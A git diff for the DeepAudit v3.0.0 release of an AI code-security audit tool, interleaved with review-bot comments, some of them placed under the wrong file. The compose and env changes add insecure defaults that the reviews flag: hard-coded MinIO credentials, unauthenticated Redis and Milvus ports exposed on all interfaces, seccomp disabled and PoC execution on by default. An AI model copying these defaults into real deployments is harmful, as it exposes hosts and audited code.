diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 9834273..7f73157 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -6,7 +6,7 @@ on:
 workflow_dispatch:
 inputs:
 version:
- description: '版本号 (例如: v2.0.0)'
+ description: '版本号 (例如: v3.0.0)'
 required: true
 type: string
 prerelease:
@@ -112,7 +112,7 @@ jobs:
 --exclude=backend/uploads \
 backend/
- # 打包 Docker 配置文件
+ # 打包 Docker 配置文件(包含 Agent 模式配置)
 tar -czf release/deepaudit-docker-${{ steps.version.outputs.VERSION }}.tar.gz \
 docker-compose.yml \
 backend/Dockerfile \
@@ -121,7 +121,8 @@ jobs:
 frontend/.dockerignore \
 frontend/docker-entrypoint.sh \
 backend/env.example \
- frontend/.env.example
+ frontend/.env.example \
+ docker/sandbox/
 # 打包完整源码(包括配置文件)
 tar -czf release/deepaudit-source-${{ steps.version.outputs.VERSION }}.tar.gz \
@@ -157,12 +158,19 @@ jobs:
 echo "" >> CHANGELOG.md
 echo "" >> CHANGELOG.md
+ echo "## 🚀 v3.0.0 新特性" >> CHANGELOG.md
+ echo "" >> CHANGELOG.md
+ echo "- 🤖 **Multi-Agent 架构**: Orchestrator/Analysis/Recon/Verification 多智能体协作" >> CHANGELOG.md
+ echo "- 🧠 **RAG 知识库增强**: 代码语义理解 + CWE/CVE 漏洞知识库" >> CHANGELOG.md
+ echo "- 🔒 **沙箱漏洞验证**: Docker 安全容器自动执行 PoC" >> CHANGELOG.md
+ echo "- 🛠️ **专业安全工具集成**: Semgrep, Bandit, Gitleaks, OSV-Scanner" >> CHANGELOG.md
+ echo "" >> CHANGELOG.md
 echo "## 📦 下载说明" >> CHANGELOG.md
 echo "" >> CHANGELOG.md
 echo "### 构建产物" >> CHANGELOG.md
 echo "- \`deepaudit-frontend-*.tar.gz\`: 前端构建产物(用于生产部署)" >> CHANGELOG.md
 echo "- \`deepaudit-backend-*.tar.gz\`: 后端源码包" >> CHANGELOG.md
- echo "- \`deepaudit-docker-*.tar.gz\`: Docker 配置文件" >> CHANGELOG.md
+ echo "- \`deepaudit-docker-*.tar.gz\`: Docker 配置文件(包含沙箱配置)" >> CHANGELOG.md
 echo "- \`deepaudit-source-*.tar.gz\`: 完整源码包" >> CHANGELOG.md
 echo "- \`checksums.txt\`: 文件校验和" >> CHANGELOG.md
 echo "" >> CHANGELOG.md
@@ -172,8 +180,11 @@ jobs:
 echo "" >> CHANGELOG.md
 echo "### 快速部署" >> CHANGELOG.md
 echo "\`\`\`bash" >> CHANGELOG.md
- echo "# 使用 Docker Compose 部署" >> CHANGELOG.md
- echo "docker-compose up -d" >> CHANGELOG.md
+ echo "# 基础部署" >> CHANGELOG.md
+ echo "docker compose up -d" >> CHANGELOG.md
+ echo "" >> CHANGELOG.md
+ echo "# Agent 模式部署(包含 Milvus 向量数据库)" >> CHANGELOG.md
+ echo "docker compose --profile agent up -d" >> CHANGELOG.md
 echo "\`\`\`" >> CHANGELOG.md
 # 12. 创建 GitHub Release
@@ -235,7 +246,21 @@ jobs:
 cache-from: type=gha,scope=backend
 cache-to: type=gha,mode=max,scope=backend
- # 18. 更新 README 中的版本号
+ # 18. 构建并推送沙箱 Docker 镜像
+ - name: 构建并推送沙箱 Docker 镜像
+ uses: docker/build-push-action@v5
+ with:
+ context: ./docker/sandbox
+ file: ./docker/sandbox/Dockerfile
+ push: true
+ platforms: linux/amd64,linux/arm64
+ tags: |
+ ghcr.io/${{ github.repository_owner }}/deepaudit-sandbox:${{ steps.version.outputs.VERSION }}
+ ghcr.io/${{ github.repository_owner }}/deepaudit-sandbox:latest
+ cache-from: type=gha,scope=sandbox
+ cache-to: type=gha,mode=max,scope=sandbox
+
+ # 19. 更新 README 中的版本号
 - name: 更新 README 版本号
 if: github.event_name == 'push'
 run: |
diff --git a/.gitignore b/.gitignore
index 2c86f48..3a78edf 100644
--- a/.gitignore
+++ b/.gitignore
@@ -168,3 +168,25 @@ Thumbs.db
 *.crt
 secrets/
 .secrets/
+
+# Agent checkpoints and data
+agent_checkpoints/
+data/
+*.checkpoint
+
+# Scan result files (temporary)
+bandit_results.json
+semgrep_results.json
+gitleaks_results.json
+trufflehog_results.json
+
+# Test files
+ttt/
+examples/
+
+# Milvus data
+milvus_data/
+
+# ChromaDB data
+chroma/
+
diff --git a/README.md b/README.md
index 7087d50..c6c6ad5 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,4 @@
-# DeepAudit - 您的智能代码审计专家 🦸‍♂️
-
-> 多Agent、PR批量自动审计版本正在开发中,敬请期待......
+# DeepAudit - AI 驱动的智能代码安全审计平台 🛡️
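Review bot: The sandbox image pushed in step 18 is published only under mutable tags (`:latest` and `:${VERSION}`) with no digest recorded, no signature and no attestation, and the step itself uses the floating `docker/build-push-action@v5`; this is the image that executes generated PoCs, so anything that retags or overwrites `latest` silently changes what every verification run executes. Add `id: sandbox` plus `provenance: true` and `sbom: true` under `with:`, and surface `${{ steps.sandbox.outputs.digest }}` in the release notes or in the `checksums.txt` the changelog step advertises, so deployers can pin `ghcr.io/<owner>/deepaudit-sandbox@sha256:…`; pin the action by commit SHA with a `# v5` comment. Separately, `backend/env.example` in this same commit ships `SANDBOX_IMAGE=deepaudit-sandbox:latest` (the local `build.sh` name), so nothing in the repo actually consumes the ghcr.io artifact built here — worth aligning. The enclosing job and its `steps:` list begin before this hunk.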
DeepAudit Logo @@ -8,7 +6,7 @@
-[![Version](https://img.shields.io/badge/version-2.0.0--beta.7-blue.svg)](https://github.com/lintsinghua/DeepAudit/releases) +[![Version](https://img.shields.io/badge/version-3.0.0-blue.svg)](https://github.com/lintsinghua/DeepAudit/releases) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![React](https://img.shields.io/badge/React-18-61dafb.svg)](https://reactjs.org/) [![TypeScript](https://img.shields.io/badge/TypeScript-5.7-3178c6.svg)](https://www.typescriptlang.org/) @@ -21,33 +19,44 @@
+## 🚀 v3.0.0 新特性 + +**DeepAudit v3.0.0** 带来了革命性的 **Multi-Agent 智能审计系统**: + +- 🤖 **Multi-Agent 架构** — Orchestrator 编排决策,Analysis/Recon/Verification 多智能体协作 +- 🧠 **RAG 知识库增强** — 代码语义理解 + CWE/CVE 漏洞知识库,精准识别安全风险 +- 🔒 **沙箱漏洞验证** — Docker 安全容器自动执行 PoC,验证漏洞真实有效性 +- 🛠️ **专业安全工具集成** — Semgrep、Bandit、Gitleaks、TruffleHog、OSV-Scanner + +--- + ## 💡 这是什么? **你是否也有这样的困扰?** - 😫 人工审计的无力:哪怕我不吃不睡,也追不上代码迭代的速度 - 🤯 传统工具的噪音:每天都在清理误报,感觉自己像个垃圾分类员 -- 😰 代码隐私的风险:想用 AI 却不敢“裸奔”,生怕源码泄露给云端 +- 😰 代码隐私的风险:想用 AI 却不敢"裸奔",生怕源码泄露给云端 - 🥺 外包项目的隐患:不知道里面藏了多少雷,却不得不签字验收 **DeepAudit 来拯救你!** 🦸‍♂️ -- 全自动智能审计:AI 不知疲倦地自动审计,让审计速度跑赢开发节奏 -- 上下文精准理解:告别死板的正则匹配,用大模型读懂代码业务逻辑,大大降低误报率 -- 支持本地私有部署:支持本地模型运行,代码数据可以不出内网,彻底根除“裸奔”焦虑 -- 深层隐患排查:一键扫描第三方外包项目、交付项目,快速揪出隐藏后门与逻辑炸弹,让签字验收有底气 +- 全自动智能审计:AI 驱动的 Multi-Agent 系统自主编排审计策略 +- 上下文精准理解:RAG 增强的代码语义理解,大大降低误报率 +- 沙箱验证漏洞:自动生成 PoC 并在隔离环境验证,确保漏洞真实有效 +- 支持本地私有部署:支持 Ollama 本地模型,代码数据可以不出内网 -## 🎬 眼见为实,但不仅如此: +## 🎬 眼见为实: | 智能仪表盘 | 即时分析 | |:---:|:---:| | ![仪表盘](frontend/public/images/example1.png) | ![即时分析](frontend/public/images/example2.png) | | *一眼掌握项目安全态势* | *粘贴代码/上传文件,秒出结果* | -| 项目管理 | 审计报告 | +| Agent 审计 | 审计报告 | |:---:|:---:| -| 项目管理 | 审计报告 | -| *GitHub/GitLab 无缝集成* | *专业报告,一键导出* | +| Agent审计 | 审计报告 | +| *Multi-Agent 深度安全分析* | *专业报告,一键导出* | | 审计规则管理 | 提示词模板管理 | |:---:|:---:| 
@@ -60,34 +69,47 @@ -### 🧠 真正理解你的代码 -不是简单的关键词匹配,而是深度理解代码逻辑和业务意图,像人类专家一样思考。 +### 🤖 Multi-Agent 智能协作 +- **Orchestrator Agent**: 统筹编排,自主决策审计策略 +- **Recon Agent**: 信息收集,识别技术栈和入口点 +- **Analysis Agent**: 深度分析,挖掘潜在安全漏洞 +- **Verification Agent**: 沙箱验证,确认漏洞真实有效 + +### 🧠 RAG 知识库增强 +- 代码语义理解,不只是关键词匹配 +- CWE/CVE 漏洞知识库集成 +- 精准漏洞识别,大幅降低误报 ### 🎯 What-Why-How 三步修复 - **What**: 精准定位问题所在 - **Why**: 解释为什么这是个问题 - **How**: 给出可直接使用的修复建议 -### 🔌 10+ LLM 平台任你选 -OpenAI、Claude、Gemini、通义千问、DeepSeek、智谱AI... 想用哪个用哪个,还支持 Ollama 本地部署! - -### ⚡ 5 分钟快速上手 -Docker 一键部署,浏览器配置 API Key,无需复杂环境搭建。 +### 🔒 沙箱安全验证 +- Docker 隔离容器执行 PoC +- 资源限制 + 网络隔离 + seccomp 策略 +- 自动验证漏洞可利用性 -### 🔒 代码隐私有保障 -支持 Ollama 本地模型,敏感代码不出内网,安全合规无忧。 +### 🛠️ 专业安全工具集成 +- **Semgrep**: 多语言静态分析 +- **Bandit**: Python 安全扫描 +- **Gitleaks/TruffleHog**: 密钥泄露检测 +- **OSV-Scanner**: 依赖漏洞扫描 -### 📊 专业报告一键导出 -JSON、PDF 格式随心选,审计报告直接交付,省去整理时间。 +### 🔌 10+ LLM 平台任你选 +OpenAI、Claude、Gemini、通义千问、DeepSeek、智谱AI... +还支持 Ollama 本地私有化部署! -## 🚀 3 步开始你的智能审计之旅 +## 🚀 快速开始 + +### Docker Compose 一键部署(推荐) ```bash # 1️⃣ 克隆项目 @@ -98,14 +120,26 @@ cp backend/env.example backend/.env # 编辑 backend/.env,填入你的 API Key # 3️⃣ 一键启动! -docker-compose up -d +docker compose up -d ``` 🎉 **搞定!** 打开 http://localhost:3000 开始体验吧! +### Agent 审计模式部署(可选) + +如需使用 Multi-Agent 深度审计功能: + +```bash +# 启动包含 Milvus 向量数据库的完整服务 +docker compose --profile agent up -d + +# 构建安全沙箱镜像(用于漏洞验证) +cd docker/sandbox && ./build.sh +``` + ### 演示账户 -系统内置演示账户,包含示例项目和审计数据,可直接体验完整功能: +系统内置演示账户,包含示例项目和审计数据: - 📧 邮箱:`demo@example.com` - 🔑 密码:`demo123` 
@@ -118,12 +152,15 @@ docker-compose up -d | 功能 | 说明 | |------|------| +| 🤖 **Agent 审计** | Multi-Agent 架构,Orchestrator 自主编排决策,深度漏洞挖掘 | +| 🧠 **RAG 增强** | 代码语义理解,CWE/CVE 知识库检索,精准漏洞识别 | +| 🔒 **沙箱验证** | Docker 安全容器执行 PoC,自动验证漏洞有效性 | | 🗂️ **项目管理** | GitHub/GitLab 一键导入,ZIP 上传,支持 10+ 编程语言 | | ⚡ **即时分析** | 代码片段秒级分析,粘贴即用,无需创建项目 | | 🔍 **智能审计** | Bug、安全、性能、风格、可维护性五维检测 | | 💡 **可解释分析** | What-Why-How 模式,精准定位 + 修复建议 | -| 📋 **审计规则** | 内置 OWASP Top 10、代码质量、性能优化规则集,支持自定义 | -| 📝 **提示词模板** | 可视化管理审计提示词,支持中英文双语,在线测试 | +| 📋 **审计规则** | 内置 OWASP Top 10、代码质量、性能优化规则集 | +| 📝 **提示词模板** | 可视化管理审计提示词,支持中英文双语 | | 📊 **可视化报告** | 质量仪表盘、趋势分析、PDF/JSON 一键导出 | | ⚙️ **灵活配置** | 浏览器运行时配置 LLM,无需重启服务 | @@ -141,15 +178,22 @@ docker-compose up -d ## 🎯 未来蓝图 -这个项目目前还比较初级,很多地方做得不够好,我们一直在努力改进!接下来才是我们真正想做的事情! +### ✅ 已完成 -- **接入 CI/CD** — 让它能跑在 GitHub/GitLab 流水线里,提 PR 的时候自动帮你批量审代码 -- **RAG 知识库** — 把 CWE/CVE 这些漏洞库喂给模型,让它真正懂安全,不再瞎报一通 -- **多 Agent 协作** — 多智能体架构,模拟真实的安全团队工作流程 -- **自动生成补丁** — 光说哪里有问题不够,还得能自动生成能用的修复代码 -- **混合分析** — AI 分析完再用传统 SAST 工具验证一遍,两边互相补充,减少误报漏报 -- **跨文件分析** — 做代码知识图谱,理解模块间的调用关系 -- **多仓库支持** — 除Github/GitLab以外,更新支持Gitea等更多平台以及自建仓库 +- ✅ **RAG 知识库** — 代码语义理解 + CWE/CVE 漏洞知识库集成 +- ✅ **多 Agent 协作** — Orchestrator/Analysis/Recon/Verification 多智能体架构 +- ✅ **沙箱验证** — Docker 安全容器自动执行 PoC 验证 + +### 🚧 开发中 + +- 🔄 **CI/CD 集成** — GitHub/GitLab 流水线自动审计,PR 批量扫描 +- 🔄 **自动生成补丁** — 基于漏洞分析自动生成修复代码 +- 🔄 **跨文件分析** — 代码知识图谱,理解模块间调用关系 + +### 📋 计划中 + +- 📋 **混合分析** — AI 分析 + 传统 SAST 工具验证,减少误报漏报 +- 📋 **多仓库支持** — Gitea、Bitbucket 等更多平台支持 💡 **您的 Star 和反馈是我们前进的最大动力!有任何想法欢迎提 Issue 一起讨论~** @@ -158,7 +202,8 @@ docker-compose up -d | 文档 | 说明 | |------|------| | [部署指南](docs/DEPLOYMENT.md) | Docker 部署 / 本地开发环境搭建 | -| [配置说明](docs/CONFIGURATION.md) | 后端配置、审计规则、提示词模板、API 中转站 | +| [Agent 审计](docs/AGENT_AUDIT.md) | Multi-Agent 审计模块详解 | +| [配置说明](docs/CONFIGURATION.md) | 后端配置、审计规则、提示词模板 | | [LLM 平台支持](docs/LLM_PROVIDERS.md) | 各家 LLM 的配置方法和 API Key 获取 | | [常见问题](docs/FAQ.md) | 遇到问题先看这里 | | [更新日志](CHANGELOG.md) | 版本更新记录 | 
diff --git a/backend/env.example b/backend/env.example
index e798ed4..949f98c 100644
--- a/backend/env.example
+++ b/backend/env.example
@@ -1,5 +1,5 @@
 # =============================================
-# DeepAudit Backend 配置文件
+# DeepAudit v3.0.0 Backend 配置文件
 # =============================================
 # 复制此文件为 .env 并填入实际配置
 # 详细说明请参阅 docs/CONFIGURATION.md
@@ -105,6 +105,70 @@ LLM_MAX_TOKENS=4096
 # Ollama 本地模型
 # OLLAMA_BASE_URL=http://localhost:11434/v1
+# =============================================
+# Agent 审计配置 (Multi-Agent v3.0.0 新增)
+# =============================================
+# Agent 审计开关(开启后可使用 Multi-Agent 深度审计功能)
+AGENT_ENABLED=true
+
+# Agent 最大迭代次数
+AGENT_MAX_ITERATIONS=5
+
+# Agent 单次审计超时时间(秒)
+AGENT_TIMEOUT=1800
+
+# =============================================
+# 嵌入模型配置(RAG 功能,独立于主 LLM)
+# =============================================
+# 嵌入模型 provider: openai, ollama, cohere, huggingface
+EMBEDDING_PROVIDER=openai
+
+# 嵌入模型名称
+# OpenAI: text-embedding-3-small, text-embedding-3-large, text-embedding-ada-002
+# Ollama: nomic-embed-text, mxbai-embed-large
+EMBEDDING_MODEL=text-embedding-3-small
+
+# 嵌入模型 API Key(留空则使用 LLM_API_KEY)
+EMBEDDING_API_KEY=
+
+# 嵌入模型 Base URL(留空则使用默认值)
+EMBEDDING_BASE_URL=
+
+# =============================================
+# 向量数据库配置(RAG 功能)
+# =============================================
+# 向量数据库类型: milvus, chroma
+VECTOR_DB_TYPE=chroma
+
+# ChromaDB 配置(本地模式)
+CHROMA_PERSIST_DIRECTORY=./data/chroma
+
+# Milvus 配置(Agent 模式推荐)
+# Docker Compose --profile agent 启动时使用 milvus 作为 host
+MILVUS_HOST=localhost
+MILVUS_PORT=19530
+
+# =============================================
+# 沙箱配置(漏洞验证)
+# =============================================
+# 沙箱功能开关
+SANDBOX_ENABLED=true
+
+# 沙箱 Docker 镜像(需要提前构建: cd docker/sandbox && ./build.sh)
+SANDBOX_IMAGE=deepaudit-sandbox:latest
+
+# 沙箱内存限制
+SANDBOX_MEMORY_LIMIT=512m
+
+# 沙箱 CPU 限制(核心数)
+SANDBOX_CPU_LIMIT=1.0
+
+# 是否禁用沙箱网络(安全建议开启)
+SANDBOX_NETWORK_DISABLED=true
+
+# 沙箱执行超时时间(秒)
+SANDBOX_TIMEOUT=30
+
 # =============================================
 # Git 仓库配置
 # =============================================
diff --git a/bandit_results.json b/bandit_results.json
deleted file mode 100644
index e69de29..0000000
diff --git a/check_imports.py b/check_imports.py
deleted file mode 100644
index 6e3ff5c..0000000
--- a/check_imports.py
+++ /dev/null
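Review bot: `SANDBOX_ENABLED=true` and `AGENT_ENABLED=true` turn on PoC execution by default in the file the quick start tells users to copy verbatim, and `SANDBOX_IMAGE=deepaudit-sandbox:latest` names a mutable tag that `build.sh` overwrites, so whichever image currently carries `latest` on the host is the one that runs attacker-influenced payloads. Ship the example with `SANDBOX_ENABLED=false` plus a comment that enabling it requires the backend to drive the Docker daemon (how the backend container gets that access is not visible in this diff — presumably a socket mount, which is root-equivalent on the host and worth saying explicitly), and point `SANDBOX_IMAGE` at a versioned tag or an `@sha256:` digest. `MILVUS_HOST=localhost` also contradicts the comment immediately above it and `docs/DEPLOYMENT.md` in this same commit (`MILVUS_HOST=milvus`), so the compose profile will not reach Milvus until the user edits it. `SANDBOX_NETWORK_DISABLED=true` as the default is the right choice and should stay.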
@@ -1,16 +0,0 @@
- try:
- import docker
- client = docker.from_env()
- client.ping()
- print("Docker is available and connected")
-except Exception as e:
- print(f"Docker connection failed: {e}")
-
-try:
- from app.services.agent.tools.sandbox_tool import SandboxConfig, SandboxManager, SandboxTool # pyright: ignore[reportMissingImports]
- print("Sandbox modules imported successfully")
-except ImportError as e:
- print(f"Sandbox import failed: {e}")
-except Exception as e:
- print(f"Sandbox import error: {e}")
diff --git a/docker-compose.yml b/docker-compose.yml
index 2eaf4f3..62e1b83 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,4 +1,14 @@
+# =============================================
+# DeepAudit v3.0.0 Docker Compose 配置
+# =============================================
+# 基础部署: docker compose up -d
+# Agent 模式: docker compose --profile agent up -d
+
 services:
+ # =============================================
+ # 核心服务
+ # =============================================
+
 db:
 image: postgres:15-alpine
 volumes:
@@ -47,6 +57,90 @@ services:
 networks:
 - deepaudit-network
+ # =============================================
+ # Agent 审计模式服务 (可选)
+ # 使用 --profile agent 启用
+ # =============================================
+
+ # Milvus 向量数据库 (用于 RAG 功能)
+ milvus-etcd:
+ image: quay.io/coreos/etcd:v3.5.5
+ profiles: ["agent"]
+ environment:
+ - ETCD_AUTO_COMPACTION_MODE=revision
+ - ETCD_AUTO_COMPACTION_RETENTION=1000
+ - ETCD_QUOTA_BACKEND_BYTES=4294967296
+ - ETCD_SNAPSHOT_COUNT=50000
+ volumes:
+ - milvus_etcd:/etcd
+ command: etcd -advertise-client-urls=http://127.0.0.1:2379 -listen-client-urls http://0.0.0.0:2379 --data-dir /etcd
+ healthcheck:
+ test: ["CMD", "etcdctl", "endpoint", "health"]
+ interval: 30s
+ timeout: 20s
+ retries: 3
+ networks:
+ - deepaudit-network
+
+ milvus-minio:
+ image: minio/minio:RELEASE.2023-03-20T20-16-18Z
+ profiles: ["agent"]
+ environment:
+ MINIO_ACCESS_KEY: minioadmin
+ MINIO_SECRET_KEY: minioadmin
+ volumes:
+ - milvus_minio:/minio_data
+ command: minio server /minio_data --console-address ":9001"
+ healthcheck:
+ test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
+ interval: 30s
+ timeout: 20s
+ retries: 3
+ networks:
+ - deepaudit-network
+
+ milvus:
+ image: milvusdb/milvus:v2.4-latest
+ profiles: ["agent"]
+ command: ["milvus", "run", "standalone"]
+ security_opt:
+ - seccomp:unconfined
+ environment:
+ ETCD_ENDPOINTS: milvus-etcd:2379
+ MINIO_ADDRESS: milvus-minio:9000
+ volumes:
+ - milvus_data:/var/lib/milvus
+ ports:
+ - "19530:19530"
+ - "9091:9091"
+ depends_on:
+ - milvus-etcd
+ - milvus-minio
+ healthcheck:
+ test: ["CMD", "curl", "-f", "http://localhost:9091/healthz"]
+ interval: 30s
+ start_period: 90s
+ timeout: 20s
+ retries: 3
+ networks:
+ - deepaudit-network
+
+ # Redis (用于任务队列,可选)
+ redis:
+ image: redis:7-alpine
+ profiles: ["agent"]
+ ports:
+ - "6379:6379"
+ volumes:
+ - redis_data:/data
+ healthcheck:
+ test: ["CMD", "redis-cli", "ping"]
+ interval: 10s
+ timeout: 5s
+ retries: 5
+ networks:
+ - deepaudit-network
+
 networks:
 deepaudit-network:
 driver: bridge
@@ -54,3 +148,7 @@ networks:
 volumes:
 postgres_data:
 backend_uploads:
+ milvus_etcd:
+ milvus_minio:
+ milvus_data:
+ redis_data:
diff --git a/docs/AGENT_AUDIT.md b/docs/AGENT_AUDIT.md
index 0a85432..e1a1a15 100644
--- a/docs/AGENT_AUDIT.md
+++ b/docs/AGENT_AUDIT.md
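Review bot: The `agent` profile publishes Milvus (`19530`, `9091`) and Redis (`6379`) on every host interface with no authentication, and MinIO is started with the hard-coded credentials `minioadmin`/`minioadmin`; only the backend on `deepaudit-network` needs these services, so on any host reachable from a network this exposes the RAG corpus (the audited source code) and an open Redis to whoever can connect. Bind the published ports to loopback or drop the `ports:` blocks, and take the MinIO credentials from `.env` with a required-variable expansion so a missing value fails at `up` rather than defaulting. `security_opt: seccomp:unconfined` on `milvus` disables the default syscall filter for that container — if this Milvus build genuinely needs it, a one-line comment saying so would stop it being copied to other services. `milvusdb/milvus:v2.4-latest` is a floating tag and the MinIO image is a 2023 release whose `MINIO_ACCESS_KEY`/`MINIO_SECRET_KEY` variables are the legacy names (presumably still honoured — verify); pinning both by digest would make the profile reproducible.
```yaml
  milvus-minio:
    # … unchanged: image, profiles …
    environment:
      MINIO_ACCESS_KEY: ${MINIO_ACCESS_KEY:?set MINIO_ACCESS_KEY in .env}
      MINIO_SECRET_KEY: ${MINIO_SECRET_KEY:?set MINIO_SECRET_KEY in .env}
    # … unchanged: volumes, command, healthcheck, networks …

  milvus:
    # … unchanged: image, profiles, command, security_opt, environment, volumes …
    ports:
      - "127.0.0.1:19530:19530"
      - "127.0.0.1:9091:9091"
    # … unchanged: depends_on, healthcheck, networks …

  redis:
    # … unchanged: image, profiles …
    ports:
      - "127.0.0.1:6379:6379"
    # … unchanged: volumes, healthcheck, networks …
```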
@@ -1,83 +1,109 @@ -# DeepAudit Agent 审计模块 +# DeepAudit Agent 审计模块 v3.0.0 ## 概述 -Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph** 状态图构建的混合 AI Agent 架构,实现自主代码安全分析和漏洞验证。 +Agent 审计模块是 DeepAudit v3.0.0 的核心功能,基于 **Multi-Agent 架构** 实现自主代码安全分析和漏洞验证。 -## LangGraph 工作流架构 +### 核心特性 + +- 🤖 **Multi-Agent 协作**: Orchestrator 编排决策,多智能体协作审计 +- 🧠 **RAG 知识库增强**: 代码语义理解 + CWE/CVE 漏洞知识库 +- 🔒 **沙箱漏洞验证**: Docker 安全容器自动执行 PoC +- 🛠️ **专业工具集成**: Semgrep、Bandit、Gitleaks、OSV-Scanner 等 + +--- + +## 架构设计 + +### Multi-Agent 工作流 ``` ┌─────────────────────────────────────────────────────────────────────┐ -│ LangGraph 审计工作流 │ +│ DeepAudit Agent 审计工作流 │ ├─────────────────────────────────────────────────────────────────────┤ │ │ │ START │ │ │ │ │ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Recon Node (信息收集) ││ -│ │ • 项目结构分析 • 技术栈识别 ││ -│ │ • 入口点发现 • 依赖扫描 ││ -│ │ ││ -│ │ 使用工具: list_files, npm_audit, safety_scan, gitleaks_scan ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Analysis Node (漏洞分析) ││ -│ │ • Semgrep 静态分析 • RAG 语义搜索 ││ -│ │ • 模式匹配 • LLM 深度分析 ││ -│ │ • 数据流追踪 ││ -│ │ ◄─────┐ ││ -│ │ 使用工具: semgrep_scan, bandit_scan, rag_query, │ ││ -│ │ code_analysis, pattern_match │ ││ -│ └────────────────────────────┬──────────────────────────┘───────┘│ -│ │ │ │ -│ ▼ │ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Verification Node (漏洞验证) ││ -│ │ • LLM 漏洞验证 • 沙箱测试 ││ -│ │ • PoC 生成 • 误报过滤 ││ -│ │ ────────┘ ││ -│ │ 使用工具: vulnerability_validation, sandbox_exec, ││ -│ │ verify_vulnerability ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Report Node (报告生成) ││ -│ │ • 漏洞汇总 • 安全评分 ││ -│ │ • 修复建议 • 统计分析 ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ END │ -│ │ 
-└────────────────────────────────────────────────────────────────────┘ - -状态流转: - • Recon → Analysis: 收集到入口点后进入分析 - • Analysis → Analysis: 发现较多问题时继续迭代 - • Analysis → Verification: 有发现时进入验证 - • Verification → Analysis: 误报率高时回溯分析 - • Verification → Report: 验证完成后生成报告 +│ ┌────────────────────────────────────────────────────────────────┐ │ +│ │ Orchestrator Agent (编排决策) │ │ +│ │ • 分析审计目标 • 制定审计策略 │ │ +│ │ • 分配子任务 • 汇总审计结果 │ │ +│ └────────────────────────────┬───────────────────────────────────┘ │ +│ │ │ +│ ┌────────────────┼────────────────┐ │ +│ ▼ ▼ ▼ │ +│ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ │ +│ │ Recon Agent │ │ Analysis Agent │ │Verification Agent│ │ +│ │ (信息收集) │ │ (漏洞分析) │ │ (漏洞验证) │ │ +│ │ │ │ │ │ │ │ +│ │ • 项目结构分析 │ │ • Semgrep 扫描 │ │ • 沙箱测试 │ │ +│ │ • 技术栈识别 │ │ • RAG 语义搜索 │ │ • PoC 生成 │ │ +│ │ • 入口点发现 │ │ • LLM 深度分析 │ │ • 误报过滤 │ │ +│ │ • 依赖扫描 │ │ • 数据流追踪 │ │ • 置信度评估 │ │ +│ └────────┬─────────┘ └────────┬─────────┘ └────────┬─────────┘ │ +│ │ │ │ │ +│ └────────────────────┴────────────────────┘ │ +│ │ │ +│ ▼ │ +│ ┌────────────────────────────────────────────────────────────────┐ │ +│ │ Report Generation │ │ +│ │ • 漏洞汇总 • 安全评分 │ │ +│ │ • 修复建议 • 统计分析 │ │ +│ └────────────────────────────┬───────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ END │ +│ │ +└─────────────────────────────────────────────────────────────────────┘ ``` -## 核心特性 +### Agent 职责 -### 1. LangGraph 状态图 +| Agent | 职责 | 使用工具 | +|-------|------|----------| +| **Orchestrator** | 统筹编排,自主决策审计策略 | 任务分配、结果汇总 | +| **Recon** | 信息收集,识别技术栈和入口点 | list_files, npm_audit, safety_scan, gitleaks | +| **Analysis** | 深度分析,挖掘潜在安全漏洞 | semgrep, bandit, rag_query, code_analysis | +| **Verification** | 沙箱验证,确认漏洞真实有效 | sandbox_exec, vulnerability_validation | -- **声明式工作流**: 使用图结构定义 Agent 协作流程 -- **状态自动合并**: `Annotated[List, operator.add]` 实现发现累加 -- **条件路由**: 基于状态动态决定下一步 -- **检查点恢复**: 支持任务中断后继续 +--- -### 2. Agent 工具集 +## 快速开始 -#### 内置工具 +### 1. 
部署 Agent 模式 -| 工具 | 功能 | 节点 | -|------|------|------| +```bash +# 配置环境变量 +cp backend/env.example backend/.env +# 编辑 .env,设置 AGENT_ENABLED=true + +# 启动包含 Milvus 的完整服务 +docker compose --profile agent up -d +``` + +### 2. 构建沙箱镜像 + +```bash +cd docker/sandbox +./build.sh +``` + +### 3. 使用 Agent 审计 + +1. 在项目详情页点击 "Agent 审计" +2. 选择目标漏洞类型 +3. 可选:上传知识库文件增强检测 +4. 启动审计,实时查看 Agent 执行日志 + +--- + +## 工具集 + +### 内置工具 + +| 工具 | 功能 | Agent | +|------|------|-------| | `list_files` | 目录浏览 | Recon | | `read_file` | 文件读取 | All | | `search_code` | 代码搜索 | Analysis | @@ -91,7 +117,7 @@ Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph | `sandbox_exec` | 沙箱执行 | Verification | | `verify_vulnerability` | 自动验证 | Verification | -#### 外部安全工具 +### 外部安全工具 | 工具 | 功能 | 适用场景 | |------|------|----------| 
